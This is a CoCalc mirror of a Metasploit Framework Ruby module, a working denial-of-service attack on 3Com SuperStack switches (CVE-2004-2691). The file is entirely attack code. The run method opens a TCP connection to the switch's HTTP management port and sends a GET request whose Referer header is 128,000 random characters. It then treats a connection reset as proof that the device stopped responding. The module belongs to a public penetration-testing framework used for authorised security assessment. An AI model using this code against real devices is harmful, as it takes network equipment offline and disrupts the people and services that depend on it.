CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/3com_superstack_switch.rb
Views: 11784
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Tcp
8
include Msf::Auxiliary::Dos
9
10
def initialize(info = {})
11
super(update_info(info,
12
'Name' => '3Com SuperStack Switch Denial of Service',
13
'Description' => %q{
14
This module causes a temporary denial of service condition
15
against 3Com SuperStack switches. By sending excessive data
16
to the HTTP Management interface, the switch stops responding
17
temporarily. The device does not reset. Tested successfully
18
against a 3300SM firmware v2.66. Reported to affect versions
19
prior to v2.72.
20
},
21
'Author' => [ 'aushack' ],
22
'License' => MSF_LICENSE,
23
'References' =>
24
[
25
# aushack - I am not sure if these are correct, but the closest match!
26
[ 'OSVDB', '7246' ],
27
[ 'CVE', '2004-2691' ],
28
[ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ],
29
],
30
'DisclosureDate' => '2004-06-24'))
31
32
register_options( [ Opt::RPORT(80) ])
33
end
34
35
def run
36
begin
37
connect
38
print_status("Sending DoS packet to #{rhost}:#{rport}")
39
40
sploit = "GET / HTTP/1.0\r\n"
41
sploit << "Referer: " + Rex::Text.rand_text_alpha(1) * 128000
42
43
sock.put(sploit +"\r\n\r\n")
44
disconnect
45
print_error("DoS packet unsuccessful")
46
rescue ::Rex::ConnectionRefused
47
print_error("Unable to connect to #{rhost}:#{rport}")
48
rescue ::Errno::ECONNRESET
49
print_good("DoS packet successful. #{rhost} not responding.")
50
end
51
52
end
53
end
54
55